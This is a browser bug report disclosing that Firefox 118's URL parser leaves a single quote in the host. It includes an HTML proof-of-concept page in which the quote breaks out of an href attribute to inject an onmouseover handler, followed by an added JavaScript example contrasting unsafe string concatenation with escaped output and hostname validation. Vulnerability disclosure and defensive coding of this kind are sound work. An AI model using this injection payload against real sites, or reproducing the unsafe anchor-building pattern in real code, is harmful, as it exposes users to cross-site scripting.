Bug 1858119 Comment 0 Edit History


BUG
============
Improper validation of URL causes major security issue

TESTED VERSION
===============
Tested in Firefox 118.0.1 on Windows and Linux

DETAILS
===============
Firefox has a built-in URL parser, `new URL()`.
But it does not properly escape/encode single quotes (') in the host part of a URL. So this causes various security vulnerabilities.

Try the command below and see the result:

```
new URL("http://example.com'/")
```
result

```
URL { href: "http://example.com'/", origin: "http://example.com'", protocol: "http:", username: "", password: "", host: "example.com'", hostname: "example.com'", port: "", pathname: "/", search: "" }
```
Here the provided malicious URL is http://example.com'/ and new URL() does not escape/encode the single quote (') in the href, hostname and origin parts of this URL.


Here I found the RFC. A host can only contain dots, alphanumerics and "-".
https://www.rfc-editor.org/rfc/rfc3986.html Page-20
https://datatracker.ietf.org/doc/html/rfc1738  page 5
```
   defined in Section 3.5 of [RFC1034] and Section 2.1 of [RFC1123].
   Such a name consists of a sequence of domain labels separated by ".",
   each domain label starting and ending with an alphanumeric character
   and possibly also containing "-" characters.  The rightmost domain
   label of a fully qualified domain name in DNS may be followed by a
   single "." and should be if it is necessary to distinguish between
   the complete domain name and some local domain.
```

I just checked: all the modern browsers like Chrome, Microsoft Edge, Opera, Brave, Vivaldi, Safari and Yandex properly filter this payload.
They URL-encode the single quotes (') present in the host part.
Firefox is the only exception.

Here is sample code to perform the XSS attack:

```
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>

<div id=aaa>
</div>

<script>
// Firefox keeps the ' in the host, so u.href is exactly
// http://example.com'/onmouseover=alert();//
var u = new URL("http://example.com'/onmouseover=alert();//");
// The ' from the host closes the single-quoted href attribute, and
// /onmouseover=alert();//' is then parsed as a second attribute.
var hh = "<a href='" + u.href + "'>sddsf</a>";
document.getElementById("aaa").innerHTML = hh;
</script>

</body>
</html>
```

Host this page, open it in the browser and hover over the link to execute the XSS.

This is happening only because of the single quote present in the host part. This single quote (') breaks the HTML context.

You should also URL-encode the single-quote character present in the host part, just like all the other modern web browsers do.
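As an added example (not part of the bug report above), the JavaScript below shows the page-side view of the same payload: the report's string-concatenation anchor next to a version that escapes the URL before putting it into HTML, a check of a host against the RFC 1123 label grammar the report quotes, and a probe of whatever WHATWG URL implementation the script happens to run under. The `REPORTED_HREF` value is a constructed copy of the href the report shows for Firefox 118; the function names and the `isDnsHostname` grammar are this example's own assumptions, not anything from Firefox or the report.

```javascript
// Added example (not from the bug report): consume an untrusted URL safely
// even when the parser leaves a single quote in the host.
//
// Constructed input: the href the report says Firefox 118 returns for
// new URL("http://example.com'/onmouseover=alert();//").href
const REPORTED_HREF = "http://example.com'/onmouseover=alert();//";

// What the report's PoC does: interpolate u.href into a single-quoted
// attribute by string concatenation.  The ' in the host closes the href
// value, and "/onmouseover=alert();//'" is parsed as a second attribute.
function unsafeAnchor(href, text) {
  return "<a href='" + href + "'>" + text + "</a>";
}

// Minimal HTML attribute escaper: every character that can terminate an
// attribute value or start markup becomes a character reference.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened form of the same anchor: untrusted values are escaped, so the
// apostrophe survives only as text (&#39;) and can no longer end the value.
function safeAnchor(href, text) {
  return '<a href="' + escapeAttr(href) + '">' + escapeAttr(text) + "</a>";
}

// Check a host against the DNS label grammar the report quotes
// (RFC 1123 hostnames: labels of letters, digits and '-', each label
// starting and ending with a letter or digit, optional trailing dot).
// ASCII only: IDNA hosts would need xn-- conversion before this check.
function isDnsHostname(host) {
  const h = host.endsWith(".") ? host.slice(0, -1) : host;
  if (h.length === 0 || h.length > 253) return false;
  const label = /^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/;
  return h.split(".").every((l) => label.test(l));
}

// Parse with the runtime's own URL implementation and report what it does
// with the quote.  Engines differ here (the point of the report), so this
// returns the observation instead of hard-coding one engine's behaviour.
function inspectHost(input) {
  try {
    const u = new URL(input);
    return { parsed: true, host: u.hostname, validDns: isDnsHostname(u.hostname) };
  } catch (e) {
    return { parsed: false, host: null, validDns: false };
  }
}

// Demo output when run with node.
console.log("unsafe :", unsafeAnchor(REPORTED_HREF, "link"));
console.log("safe   :", safeAnchor(REPORTED_HREF, "link"));
console.log("engine :", inspectHost(REPORTED_HREF));
```

Run it with `node` to see which of the two anchors the engine you are on would have produced. In a real page the cleaner fix is to avoid `innerHTML` altogether and set `a.href = u.href` / `a.textContent = ...` on an element created with `document.createElement("a")`, which needs no escaping at all; `isDnsHostname` is the extra check for code that must reject hosts outside the RFC grammar before using them.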